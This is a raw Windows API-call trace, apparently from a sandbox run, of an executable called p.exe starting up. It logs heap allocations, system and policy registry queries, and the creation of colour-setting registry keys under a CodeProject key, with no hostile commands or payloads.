!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿBĀ") returned 256 [0050.055] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿBĀ", cchWideChar=256, lpMultiByteStr=0x18fac8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x01", lpUsedDefaultChar=0x0) returned 256 [0050.055] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x42cc18, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p.exe")) returned 0x2b [0050.055] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x34) returned 0x29f1488 [0050.055] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x98) returned 0x29f14c8 [0050.055] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x1f) returned 0x29f1568 [0050.056] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x36) returned 0x29f1590 [0050.056] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x37) returned 0x29f15d0 [0050.056] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x3c) returned 0x29f1610 [0050.056] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x31) returned 0x29f1658 [0050.056] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x17) returned 0x29f1698 [0050.056] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x24) returned 0x29f16b8 [0050.056] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x14) returned 0x29f16e8 [0050.056] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0xd) returned 0x29f1708 [0050.056] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x25) returned 0x29f1720 [0050.056] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x39) returned 0x29f1750 [0050.056] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x18) returned 0x29f1798 [0050.056] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x17) returned 0x29f17b8 [0050.056] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0xe) returned 0x29f17d8 [0050.056] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x69) returned 0x29f17f0 [0050.056] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x3e) returned 0x29f1868 [0050.056] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x1b) returned 0x29f18b0 [0050.056] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x1d) returned 0x29f18d8 [0050.056] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x48) returned 0x29f1900 [0050.056] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x12) returned 0x29f1950 [0050.056] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x18) returned 0x29f1970 [0050.056] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x1b) returned 0x29f1990 [0050.056] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x24) returned 0x29f19b8 [0050.056] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x29) returned 0x29f19e8 [0050.056] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x1e) returned 0x29f1a20 [0050.056] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x41) returned 0x29f1a48 [0050.056] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x17) returned 0x29f1a98 [0050.056] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0xf) returned 0x29f1ab8 [0050.056] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x16) returned 0x29f1ad0 [0050.056] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x2a) returned 0x29f1af0 [0050.056] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x29) returned 0x29f1b28 [0050.056] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x15) returned 0x29f1b60 [0050.057] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x1e) returned 0x29f1b80 [0050.057] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x2a) returned 0x29f1ba8 [0050.057] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x12) returned 0x29f1be0 [0050.057] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x18) returned 0x29f1c00 [0050.057] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x46) returned 0x29f1c20 [0050.057] HeapFree (in: hHeap=0x29f0000, dwFlags=0x0, lpMem=0x29f0cf0 | out: hHeap=0x29f0000) returned 1 [0050.057] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76d30000 [0050.057] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0050.057] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0050.057] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x80) returned 0x29f1c70 [0050.057] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x8, Size=0x800) returned 0x29f1cf8 [0050.057] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40d1c8) returned 0x0 [0050.058] RtlSizeHeap (HeapHandle=0x29f0000, Flags=0x0, MemoryPointer=0x29f1c70) returned 0x80 [0050.058] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fe58 | out: lpSystemTimeAsFileTime=0x18fe58*(dwLowDateTime=0x31be3e50, dwHighDateTime=0x1d68245)) [0050.058] GetCurrentProcessId () returned 0xaec [0050.058] GetCurrentThreadId () returned 0xae0 [0050.058] GetTickCount () returned 0x11478f7 [0050.058] QueryPerformanceCounter (in: lpPerformanceCount=0x18fe50 | out: lpPerformanceCount=0x18fe50*=16995118945) returned 1 [0050.058] RtlSizeHeap (HeapHandle=0x29f0000, Flags=0x0, MemoryPointer=0x29f1c70) returned 0x80 [0050.058] RtlSizeHeap (HeapHandle=0x29f0000, Flags=0x0, MemoryPointer=0x29f1c70) returned 0x80 [0050.058] RtlSizeHeap (HeapHandle=0x29f0000, Flags=0x0, MemoryPointer=0x29f1c70) returned 0x80 [0050.058] GetVersionExA (in: lpVersionInformation=0x18fdc4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18fdc4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0050.058] RtlSizeHeap (HeapHandle=0x29f0000, Flags=0x0, MemoryPointer=0x29f1c70) returned 0x80 [0050.059] GlobalLock (hMem=0xd30004) returned 0xeb8e18 [0050.059] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0xeb8f28 [0050.059] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0xeb17b8 [0050.059] LocalAlloc (uFlags=0x0, uBytes=0x8) returned 0xeb9038 [0050.059] LocalAlloc (uFlags=0x40, uBytes=0x1074) returned 0xeb9048 [0050.060] GetACP () returned 0x4e4 [0050.060] RtlSizeHeap (HeapHandle=0x29f0000, Flags=0x0, MemoryPointer=0x29f1c70) returned 0x80 [0050.060] GetCursorPos (in: lpPoint=0xeb8f74 | out: lpPoint=0xeb8f74*(x=799, y=461)) returned 1 [0050.061] LocalAlloc (uFlags=0x40, uBytes=0x80) returned 0xeba0c8 [0050.061] LocalReAlloc (hMem=0xeb9038, uBytes=0xc, uFlags=0x2) returned 0xeba150 [0050.061] GetCurrentThread () returned 0xfffffffe [0050.061] GetCurrentThreadId () returned 0xae0 [0050.061] RtlSizeHeap (HeapHandle=0x29f0000, Flags=0x0, MemoryPointer=0x29f1c70) returned 0x80 [0050.061] RegisterClipboardFormatA (lpszFormat="WM_XHYPERLINK_CLICKED") returned 0xc167 [0050.061] RtlSizeHeap (HeapHandle=0x29f0000, Flags=0x0, MemoryPointer=0x29f1c70) returned 0x80 [0050.062] RegisterClipboardFormatA (lpszFormat="commctrl_DragListMsg") returned 0xc0fc [0050.062] RtlSizeHeap (HeapHandle=0x29f0000, Flags=0x0, MemoryPointer=0x29f1c70) returned 0x80 [0050.062] RtlSizeHeap (HeapHandle=0x29f0000, Flags=0x0, MemoryPointer=0x29f1c70) returned 0x80 [0050.062] RtlSizeHeap (HeapHandle=0x29f0000, Flags=0x0, MemoryPointer=0x29f1c70) returned 0x80 [0050.062] RtlSizeHeap (HeapHandle=0x29f0000, Flags=0x0, MemoryPointer=0x29f1c70) returned 0x80 [0050.062] RtlSizeHeap (HeapHandle=0x29f0000, Flags=0x0, MemoryPointer=0x29f1c70) returned 0x80 [0050.062] RtlSizeHeap (HeapHandle=0x29f0000, Flags=0x0, MemoryPointer=0x29f1c70) returned 0x80 [0050.062] RtlSizeHeap (HeapHandle=0x29f0000, Flags=0x0, MemoryPointer=0x29f1c70) returned 0x80 [0050.062] RtlSizeHeap (HeapHandle=0x29f0000, Flags=0x0, MemoryPointer=0x29f1c70) returned 0x80 [0050.062] RtlSizeHeap (HeapHandle=0x29f0000, Flags=0x0, MemoryPointer=0x29f1c70) returned 0x80 [0050.062] GetVersion () returned 0x1db10106 [0050.062] GetSystemMetrics (nIndex=11) returned 32 [0050.064] GetCurrentProcess () returned 0xffffffff [0050.931] GetCurrentProcess () returned 0xffffffff [0050.938] GetSystemMetrics (nIndex=12) returned 32 [0050.938] GetSystemMetrics (nIndex=2) returned 17 [0050.938] GetSystemMetrics (nIndex=3) returned 17 [0050.938] GetDC (hWnd=0x0) returned 0xffffffff82010995 [0050.938] GetDeviceCaps (hdc=0x82010995, index=88) returned 96 [0050.938] GetDeviceCaps (hdc=0x82010995, index=90) returned 96 [0050.938] ReleaseDC (hWnd=0x0, hDC=0x82010995) returned 1 [0050.938] GetSysColor (nIndex=15) returned 0xf0f0f0 [0050.938] GetSysColor (nIndex=16) returned 0xa0a0a0 [0050.938] GetSysColor (nIndex=20) returned 0xffffff [0050.938] GetSysColor (nIndex=18) returned 0x0 [0050.938] GetSysColor (nIndex=6) returned 0x646464 [0050.938] GetSysColorBrush (nIndex=15) returned 0x1100059 [0050.938] GetSysColorBrush (nIndex=6) returned 0x1100061 [0050.938] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0050.938] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0050.938] RtlSizeHeap (HeapHandle=0x29f0000, Flags=0x0, MemoryPointer=0x29f1c70) returned 0x80 [0050.938] GetOEMCP () returned 0x1b5 [0050.938] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x18fe44 | out: lpCPInfo=0x18fe44) returned 1 [0050.939] GetVersion () returned 0x1db10106 [0050.939] GetVersion () returned 0x1db10106 [0050.939] GetVersion () returned 0x1db10106 [0050.939] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fd [0050.939] GetStartupInfoA (in: lpStartupInfo=0x18ff18 | out: lpStartupInfo=0x18ff18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0050.939] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0050.940] SetErrorMode (uMode=0x0) returned 0x0 [0050.940] SetErrorMode (uMode=0x8001) returned 0x0 [0050.940] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18fc2c, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p.exe")) returned 0x2b [0050.942] PathFindExtensionA (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p.exe") returned=".exe" [0050.942] PathFindFileNameA (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p") returned="p" [0050.942] lstrcpynA (in: lpString1=0x18fd30, lpString2="p", iMaxLength=260 | out: lpString1="p") returned="p" [0050.942] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x2) returned 0x29f0cf0 [0050.943] FindResourceExW (hModule=0x400000, lpType=0x6, lpName=0xe01, wLanguage=0x0) returned 0x0 [0050.944] FindResourceExA (hModule=0x400000, lpType=0x6, lpName=0xe01, wLanguage=0x0) returned 0x0 [0050.945] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x2) returned 0x29f0d00 [0050.945] lstrcpyA (in: lpString1=0x18fc53, lpString2=".HLP" | out: lpString1=".HLP") returned=".HLP" [0050.945] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x2c) returned 0x29f0d10 [0050.945] lstrcatA (in: lpString1="p", lpString2=".INI" | out: lpString1="p.INI") returned="p.INI" [0050.945] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x6) returned 0x29f0d48 [0050.945] GetCurrentThreadId () returned 0xae0 [0050.945] SetWindowsHookExA (idHook=-1, lpfn=0x417b07, hmod=0x0, dwThreadId=0xae0) returned 0x40111 [0050.946] GetModuleHandleA (lpModuleName="user32.dll") returned 0x77130000 [0050.946] GetProcAddress (hModule=0x77130000, lpProcName="NotifyWinEvent") returned 0x77152592 [0050.946] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", ulOptions=0x0, samDesired=0x1, phkResult=0x18fe44 | out: phkResult=0x18fe44*=0xd0) returned 0x0 [0050.947] RegQueryValueExA (in: hKey=0xd0, lpValueName="NoRun", lpReserved=0x0, lpType=0x18fe3c, lpData=0x18fe40, lpcbData=0x18fe34*=0x4 | out: lpType=0x18fe3c*=0x0, lpData=0x18fe40*=0x0, lpcbData=0x18fe34*=0x4) returned 0x2 [0050.947] RegQueryValueExA (in: hKey=0xd0, lpValueName="NoDrives", lpReserved=0x0, lpType=0x18fe3c, lpData=0x18fe40, lpcbData=0x18fe34*=0x4 | out: lpType=0x18fe3c*=0x0, lpData=0x18fe40*=0x0, lpcbData=0x18fe34*=0x4) returned 0x2 [0050.947] RegQueryValueExA (in: hKey=0xd0, lpValueName="RestrictRun", lpReserved=0x0, lpType=0x18fe3c, lpData=0x18fe40, lpcbData=0x18fe34*=0x4 | out: lpType=0x18fe3c*=0x0, lpData=0x18fe40*=0x0, lpcbData=0x18fe34*=0x4) returned 0x2 [0050.947] RegQueryValueExA (in: hKey=0xd0, lpValueName="NoNetConnectDisconnect", lpReserved=0x0, lpType=0x18fe3c, lpData=0x18fe40, lpcbData=0x18fe34*=0x4 | out: lpType=0x18fe3c*=0x0, lpData=0x18fe40*=0x0, lpcbData=0x18fe34*=0x4) returned 0x2 [0050.947] RegQueryValueExA (in: hKey=0xd0, lpValueName="NoRecentDocsHistory", lpReserved=0x0, lpType=0x18fe3c, lpData=0x18fe40, lpcbData=0x18fe34*=0x4 | out: lpType=0x18fe3c*=0x0, lpData=0x18fe40*=0x0, lpcbData=0x18fe34*=0x4) returned 0x2 [0050.947] RegQueryValueExA (in: hKey=0xd0, lpValueName="NoClose", lpReserved=0x0, lpType=0x18fe3c, lpData=0x18fe40, lpcbData=0x18fe34*=0x4 | out: lpType=0x18fe3c*=0x0, lpData=0x18fe40*=0x0, lpcbData=0x18fe34*=0x4) returned 0x2 [0050.947] RegCloseKey (hKey=0xd0) returned 0x0 [0050.947] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Network", ulOptions=0x0, samDesired=0x1, phkResult=0x18fe44 | out: phkResult=0x18fe44*=0x0) returned 0x2 [0050.947] RegCloseKey (hKey=0x0) returned 0x6 [0050.947] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Comdlg32", ulOptions=0x0, samDesired=0x1, phkResult=0x18fe44 | out: phkResult=0x18fe44*=0x0) returned 0x2 [0050.947] RegCloseKey (hKey=0x0) returned 0x6 [0050.947] RegCloseKey (hKey=0x0) returned 0x6 [0050.947] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0xc) returned 0x29f0d58 [0050.947] HeapFree (in: hHeap=0x29f0000, dwFlags=0x0, lpMem=0x29f0d48 | out: hHeap=0x29f0000) returned 1 [0050.947] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x2) returned 0x29f0d48 [0050.947] GetSysColor (nIndex=18) returned 0x0 [0050.948] GetSysColor (nIndex=15) returned 0xf0f0f0 [0050.948] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x8) returned 0x29f0d70 [0050.948] CreateSolidBrush (color=0xf0f0f0) returned 0x13100997 [0050.948] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x60) returned 0x29f0d80 [0050.948] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x44) returned 0x29f0de8 [0050.948] RtlAllocateHeap (HeapHandle=0x29f0000, Flags=0x0, Size=0x7c) returned 0x29f0e38 [0050.948] GetSysColor (nIndex=15) returned 0xf0f0f0 [0050.948] GetSysColor (nIndex=12) returned 0xababab [0050.948] GetSysColor (nIndex=16) returned 0xa0a0a0 [0050.949] CreateHatchBrush (iHatch=3, color=0xa0a0a0) returned 0x26100276 [0050.950] GetSysColor (nIndex=15) returned 0xf0f0f0 [0050.950] GetSysColor (nIndex=12) returned 0xababab [0050.950] GetSysColor (nIndex=16) returned 0xa0a0a0 [0050.950] CreateHatchBrush (iHatch=3, color=0xa0a0a0) returned 0x5410027b [0050.950] LoadIconA (hInstance=0x400000, lpIconName=0x80) returned 0x20235 [0050.953] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="software", ulOptions=0x0, samDesired=0x2001f, phkResult=0x18fb30 | out: phkResult=0x18fb30*=0xd0) returned 0x0 [0050.953] RegCreateKeyExA (in: hKey=0xd0, lpSubKey="CodeProject", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x18fb2c, lpdwDisposition=0x18fb24 | out: phkResult=0x18fb2c*=0xd4, lpdwDisposition=0x18fb24*=0x1) returned 0x0 [0050.954] RegCreateKeyExA (in: hKey=0xd4, lpSubKey="p", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x18fb28, lpdwDisposition=0x18fb24 | out: phkResult=0x18fb28*=0xd8, lpdwDisposition=0x18fb24*=0x1) returned 0x0 [0050.954] RegCloseKey (hKey=0xd0) returned 0x0 [0050.954] RegCloseKey (hKey=0xd4) returned 0x0 [0050.954] RegCreateKeyExA (in: hKey=0xd8, lpSubKey="Colors", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x18fb48, lpdwDisposition=0x18fb44 | out: phkResult=0x18fb48*=0xd4, lpdwDisposition=0x18fb44*=0x1) returned 0x0 [0050.954] RegCloseKey (hKey=0xd8) returned 0x0 [0050.954] RegQueryValueExA (in: hKey=0xd4, lpValueName="Text", lpReserved=0x0, lpType=0x18fb5c, lpData=0x18fb60, lpcbData=0x18fb6c*=0x4 | out: lpType=0x18fb5c*=0x0, lpData=0x18fb60*=0xe0, lpcbData=0x18fb6c*=0x4) returned 0x2 [0050.954] RegCloseKey (hKey=0xd4) returned 0x0 [0050.954] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="software", ulOptions=0x0, samDesired=0x2001f, phkResult=0x18fb30 | out: phkResult=0x18fb30*=0xd4) returned 0x0 [0050.955] RegCreateKeyExA (in: hKey=0xd4, lpSubKey="CodeProject", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x18fb2c, lpdwDisposition=0x18fb24 | out: phkResult=0x18fb2c*=0xd8, lpdwDisposition=0x18fb24*=0x2) returned 0x0 [0050.955] RegCreateKeyExA (in: hKey=0xd8, lpSubKey="p", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x18fb28, lpdwDisposition=0x18fb24 | out: phkResult=0x18fb28*=0xd0, lpdwDisposition=0x18fb24*=0x2) returned 0x0 [0050.955] RegCloseKey (hKey=0xd4) returned 0x0 [0050.955] RegCloseKey (hKey=0xd8) returned 0x0 [0050.955] RegCreateKeyExA (in: hKey=0xd0, lpSubKey="Colors", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x18fb48, lpdwDisposition=0x18fb44 | out: phkResult=0x18fb48*=0xd8, lpdwDisposition=0x18fb44*=0x2) returned 0x0 [0050.955] RegCloseKey (hKey=0xd0) returned 0x0 [0050.955] RegQueryValueExA (in: hKey=0xd8, lpValueName="Background", lpReserved=0x0, lpType=0x18fb5c, lpData=0x18fb60, lpcbData=0x18fb6c*=0x4 | out: lpType=0x18fb5c*=0x0, lpData=0x18fb60*=0xe0, lpcbData=0x18fb6c*=0x4) returned 0x2 [0050.955] RegCloseKey (hKey=0xd8) returned 0x0 [0050.955] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="software", ulOptions=0x0, samDesired=0x2001f, phkResult=0x18eb10 | out: phkResult=0x18eb10*=0xd8) returned 0x0 [0050.955] RegCreateKeyExA (in: hKey=0xd8, lpSubKey="CodeProject", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x18eb0c, lpdwDisposition=0x18eb04 | out: phkResult=0x18eb0c*=0xd0, lpdwDisposition=0x18eb04*=0x2) returned 0x0 [0050.956] RegCreateKeyExA (in: hKey=0xd0, lpSubKey="p", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x18eb08, lpdwDisposition=0x18eb04 | out: phkResult=0x18eb08*=0xd4, lpdwDisposition=0x18eb04*=0x2) returned 0x0 [0050.956] RegCloseKey (hKey=0xd8) returned 0x0 [0050.956] RegCloseKey (hKey=0xd0) returned 0x0 [0050.956] RegCreateKeyExA (in: hKey=0xd4, lpSubKey="Colors", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x18eb28, lpdwDisposition=0x18eb24 | out: phkResult=0x18eb28*=0xd0, lpdwDisposition=0x18eb24*=0x2) returned 0x0 [0050.956] RegCloseKey (hKey=0xd4) returned 0x0 [0050.956] RegQueryValueExA (in: hKey=0xd0, lpValueName="TextCustom", lpReserved=0x0, lpType=0x18eb44, lpData=0x0, lpcbData=0x18eb40*=0x18fa0c | out: lpType=0x18eb44*=0x0, lpData=0x0, lpcbData=0x18eb40*=0x0) returned 0x2 [0050.956] RegCloseKey (hKey=0xd0) returned 0x0 [0050.956] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="software", ulOptions=0x0, samDesired=0x2001f, phkResult=0x18eb10 | out: phkResult=0x18eb10*=0xd0) returned 0x0 [0050.956] RegCreateKeyExA (in: hKey=0xd0, lpSubKey="CodeProject", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x18eb0c, lpdwDisposition=0x18eb04 | out: phkResult=0x18eb0c*=0xd4, lpdwDisposition=0x18eb04*=0x2) returned 0x0 [0050.956] RegCreateKeyExA (in: hKey=0xd4, lpSubKey="p", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x18eb08, lpdwDisposition=0x18eb04 | out: phkResult=0x18eb08*=0xd8, lpdwDisposition=0x18eb04*=0x2) returned 0x0 [0050.957] RegCloseKey (hKey=0xd0) returned 0x0 [0050.957] RegCloseKey (hKey=0xd4) returned 0x0 